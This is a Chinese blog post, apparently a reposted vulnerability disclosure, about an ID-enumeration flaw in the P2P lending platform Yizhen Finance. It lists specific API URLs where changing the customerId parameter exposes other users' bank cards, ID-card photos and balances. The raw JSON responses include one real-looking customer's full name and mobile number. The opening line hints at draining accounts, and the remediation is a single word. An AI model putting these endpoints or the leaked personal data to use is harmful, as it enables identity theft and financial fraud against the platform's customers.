首页 » 漏洞 » P2P金融安全之意真金融漏洞可泄露大量用户信息(银行卡号/电话/身份证照片/余额查询等)

P2P金融安全之意真金融漏洞可泄露大量用户信息(银行卡号/电话/身份证照片/余额查询等)

 
文章目录

 

现在各种信息全有了。提现还是问题吗?

这个应该是用户的id 14051005

#1. 银行卡号查询

遍历参数 customerId

https://yizhenmoney.com:9003/esb/account/customer/bankInfo/list?customerId=14051005&

P2P金融安全之意真金融漏洞可泄露大量用户信息(银行卡号/电话/身份证照片/余额查询等)

#2. 身份证照片遍历

看这里,图片的规则先遍历是很难的 http://140.207.169.83:8000/upload/attachment5/14051005/00150001/1432363081128.jpg

但是我们只要通过遍历用户id 就能查看到图片信息。 我这边用burpsutie ,提取出来

#

https://yizhenmoney.com:9003/esb/account/customer/cardInfo/audit?customerId=14051005&

访问后是这样的
 


{

"success" : true,

"message" : "",

"attr" : {

"customerInfo" : {

"name" : null,

"cardId" : null,

"foreUrl" : "",

"foreThumbUrl" : "",

"backUrl" : "",

"backThumbUrl" : "",

"handUrl" : "",

"handThumbUrl" : "",

"status" : ""

},

"cardList" : [ {

"id" : 14098725,

"customerId" : 14051005,

"optSource" : null,

"autid" : 0,

"type" : "00150001",

"storePath" : "http://140.207.169.83:8000/upload/attachment5/14051005/00150001/1432363081128.jpg",

"subFilePath" : null,

"filePath" : "http://140.207.169.83:8000/upload/attachment5/14051005/00150001/1432363081128.jpg",

"status" : "00210001",

"version" : null,

"createDate" : null,

"creatorId" : null,

"modifyDate" : null,

"modifyerId" : null,

"remark" : null

}, {

"id" : 14098726,

"customerId" : 14051005,

"optSource" : null,

"autid" : 0,

"type" : "00150002",

"storePath" : "http://140.207.169.83:8000/upload/attachment5/14051005/00150002/1432363081156.jpg",

"subFilePath" : null,

"filePath" : "http://140.207.169.83:8000/upload/attachment5/14051005/00150002/1432363081156.jpg",

"status" : "00210001",

"version" : null,

"createDate" : null,

"creatorId" : null,

"modifyDate" : null,

"modifyerId" : null,

"remark" : null

}, {

"id" : 14098727,

"customerId" : 14051005,

"optSource" : null,

"autid" : 0,

"type" : "00150003",

"storePath" : "http://140.207.169.83:8000/upload/attachment5/14051005/00150003/1432363081184.jpg",

"subFilePath" : null,

"filePath" : "http://140.207.169.83:8000/upload/attachment5/14051005/00150003/1432363081184.jpg",

"status" : "00210001",

"version" : null,

"createDate" : null,

"creatorId" : null,

"modifyDate" : null,

"modifyerId" : null,

"remark" : null

} ]

}

}

 

P2P金融安全之意真金融漏洞可泄露大量用户信息(银行卡号/电话/身份证照片/余额查询等)

 

P2P金融安全之意真金融漏洞可泄露大量用户信息(银行卡号/电话/身份证照片/余额查询等)

http://140.207.169.83:8000/upload/attachment5/14033105/00150001/1432291395569.jpg

#3. 然后是余额查询

https://yizhenmoney.com:9003/esb/fortune/customer/accountinfo?customerId=14087605&

# 可以看到有2800

 


{

"success" : true,

"message" : "",

"attr" : {

"customerAccVo" : {

"customerId" : "14087605",

"mobile" : "13372530130",

"cnName" : "曹金富",

"recomCode" : "w5dhx2",

"status" : "0",

"avlBal" : 0.0,

"credAmount" : 2800.0,

"currPay" : 0.0,

"fortuneAmount" : 0.0,

"currProfit" : 0.0,

"redNum" : 0,

"recomProfits" : 0.0,

"withdrawStatus" : "0",

"myRecomPerson" : null,

"allNotRepayAmt" : 0.0

},

"surplusLuckNum" : 0,

"unReadMsgCount" : 1

}

}

 

解决方案:

过滤

原文链接:P2P金融安全之意真金融漏洞可泄露大量用户信息(银行卡号/电话/身份证照片/余额查询等),转载请注明来源!

0